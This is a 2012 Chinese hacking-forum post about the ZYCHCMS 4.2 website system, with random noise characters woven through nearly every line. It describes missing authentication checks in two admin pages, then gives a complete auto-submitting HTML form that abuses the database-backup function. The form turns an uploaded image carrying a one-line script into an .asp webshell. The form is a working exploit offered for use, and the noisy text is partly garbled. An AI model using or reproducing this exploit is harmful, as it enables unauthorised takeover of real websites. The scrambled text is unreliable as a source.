( @4 k( E# h5 U, T1 c4 A% v
& w g5 C ]( O; L
% E! [1 |) i. S1 E4 H$ H! Z# @! z2 D$ ~) c# Y
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)* M5 [- `, \5 b: M
①SQL注射漏洞# S+ h# s7 @ I/ _4 u% _. k
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp/ @9 w% A! m/ q1 l( R0 R- ^- f- _
漏洞原因:未过滤( b) o3 ?0 v& I, M' f
漏洞代码:
) ~; ?1 F2 |- `! ^& G 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
/ [1 f5 Y/ ^% Y6 _1 N9 u6 M+ O( B 修复方法:在文件开头加入代码- K6 h, d& x$ Y8 v
, O, B1 X8 B- y7 w& o0 C
! {& R y* f3 \; ^
②后台拿WBSHELL
5 O! h$ B4 [, A5 o 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。, y) i4 g$ \: z5 G
这里在网上找了一个,改了下,将就着用。" C. t! H8 F; d; `) E$ `
以下是代码本地提交代码
2 i9 Z O" N7 d/ [( O
# K/ F' \2 S! i
8 m' D- y0 ^2 h* J2 h: }/ U" [8 x! `<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>; C# t! r3 ^- F0 _
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>3 O7 A( X& Y s" U0 X
<tr>( [9 A+ A' M& y. Y7 n0 _: W: h( T0 [
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>: [8 D. {- Y9 o# _' @
</tr>6 w. ]* ^' M8 J% m; b
<tr>$ k6 M" x$ d5 [3 d8 G$ e# p% ?
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>0 W; S% ]: E6 F- M# S" E6 t% C
</span>- ~" z' e1 u! T
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ ># S1 z; b# s, Q+ _9 y1 ]* e8 l
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >/ \; {( m9 q: b; x- A R' ^
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>( b# j/ B+ v% Z$ o, A6 h
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d6 ]; J0 f8 } Q/ q6 C# Z3 y
<div align=”left”>7 b$ F* N' F6 v2 |
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
6 t( J& n3 ]; Z1 t# w <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
2 k2 V3 F% v6 }, E9 N: Q Z <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />6 C) w: Q5 N! x: q; c9 g
</div></td>
5 q5 o/ W: J1 E+ j </tr>
# N* L1 _4 v* w0 {/ G5 a. a. @5 a1 W <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>/ n& T1 F& u7 ^+ [, p
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
4 q* p4 V- | j <td class=”td”><div align=”left”>5 L$ l% [; O8 T3 Z
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />; |0 C1 h) M3 n! R3 G7 ]" G" h
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>$ |$ c* O0 B' V( }9 c
</tr>0 Q0 w: t8 H9 v: T7 L, Q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>* p. u/ b8 N- e# M
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
8 a1 y8 t# x: x <td class=”td”><div align=”left”>- m6 i. @' f5 w. d
<input type=”submit” value=”确定备份” class=”btn”$ ]0 P; [% z9 `: w \6 ^
</div></td>- s& H+ Y- r' A5 O* a+ x+ d2 g
</tr>
# a/ R x) t0 K: d </table></td></tr></form>" W7 ~2 N5 ~; c2 w% g, e; }
</table>
7 a6 @4 w a8 N9 y) F </td>
6 x r9 p" g+ A( | C' M8 b </tr>% h9 p4 C7 L* I
</table>
) U+ w% z/ w3 W" H( B <script>1 d- P: Q ]1 D. A/ v
document.all.add.submit();
, A: z& \" ^; v; u8 l. V </script>/ j/ Z7 k& p) x0 C$ t
) m& Y4 y6 p' d$ Z) o9 T4 h0 y5 e8 G( d- L4 d% x, `
- H2 q7 }! N6 i
1 H+ z# H( I% P) E! j9 |# u4 U* V3 c
# |" h3 r" j: v6 W4 p1 a- [" \" {4 O+ n; f% @% [
( C/ E/ B' f0 t
0 W6 P. T9 j- z+ ?/ S6 l
9 A4 L8 X6 i0 ~0 q, D' T |
发表于 2012-9-10 21:09:51
收藏
支持
反对